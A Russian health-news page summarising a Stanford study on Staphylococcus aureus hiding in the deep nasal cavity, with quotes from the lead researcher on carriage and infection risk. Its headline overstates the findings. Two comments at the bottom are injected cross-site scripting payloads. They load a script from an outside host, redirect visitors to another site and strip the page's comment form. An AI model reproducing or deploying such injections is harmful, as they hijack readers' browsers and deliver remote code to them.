Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  У вас в носу живет смерте...  >>  У вас в носу живет смертельная бактерия! А вы и не знали!
 
Обратная связь
 

У вас в носу живет смертельная бактерия! А вы и не знали!

Размер шрифта
29 апреля 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые обнаружили опасный микроорганизм, который затаился у вас в ноздрях.

У вас в носу живет смертельная бактерия! А вы и не знали!

Авторы обследовали 12 здоровых добровольцев и выяснили, что глубокие отделы полости носа (которые обычно не осматриваются должным образом)  могут являться резервуаром для золотистого стафилококка (S. aureus) – бактерии, которая вызывает огромное количество заболеваний. Отметим, что примерно половина из известных науке штаммов S. aureus обладают устойчивостью к антибиотикам. То есть от них нельзя избавиться с помощью обычных таблеток!

Известно, что этот микроб заселяет кожу и некоторые участки слизистых (в том числе и в носу). Есть способы избавиться от него, но они все временные – стафилококк почти всегда возвращается вновь спустя недели или месяцы. Присутствие этой бактерии в глубоких отделах носа, обнаруженное учеными из Стэнфордского университета (США), отчасти объясняет, почему это происходит.

«Треть всех людей на планете являются постоянными носителями S. aureus, вторая треть – периодическими носителями, а у остальных людей стафилококк не обнаруживается вовсе», – рассказывает доктор Дэвид Релман, ведущий автор исследования, профессор кафедры микробиологии и иммунологиии Стэнфордоского университета. «При этом далеко не каждый носитель стафилококка обязательно заболеет. Так что если человек чувствует себя прекрасно и носительство никак его не беспокоит, то уничтожать S. aureus нет смысла».

«Совсем другой разговор – когда такой носитель поступает в клинику с обострением хронического заболевания, или с иммунодефицитом, или для выполнения процедуры, сопряженной с повреждением кожным покровов. В этом случае золотистый стафилококк представляет собой большую опасность», – говорит доктор Рэлман. «Попав в кровоток, S. aureus может стать причиной развития крайне опасных для жизни заболеваний – сепсиса, пневмонии, эндокардита и других».

Помимо прочего, Рэлман и его коллеги обнаружили, что стафилококк конкуриует за «место под солнцем» в носу с другой бактерией – С. pseudodiphthericum. Возможно, в будущем ученые научатся применять культуры этих микробов или какие-либо вещества, продуцируемые ими, для борьбы с золотистым стафилококком.

Множество других интересных статей, посвященных инфекционным болезням и методам их лечения, ищите на страницах нашего специального проекта «Жизнь без антибиотиков».

Результаты данного исследования были опубликованы в журнале Cell Host & Microbe.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:41

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Зубная щетка полна бактериями из попы! Как не заболеть!   Горький шоколад полезен для сердца! Но все благодаря бактериям!   Блендеры и миксеры таят в себе страшного микроба, от которого не могут избавиться никакие средства! Что делать?   Храп вызывает смертельное заболевание легких! Сколько храпеть вредно?  
28 мая 2013Бактерии спасут человечество от ожирения! Новый метод похудения от гарвардских ученых 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Можно ли жить с бронхитом?
Ужасы раздевалки
Что можно и чего нельзя с изжогой?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.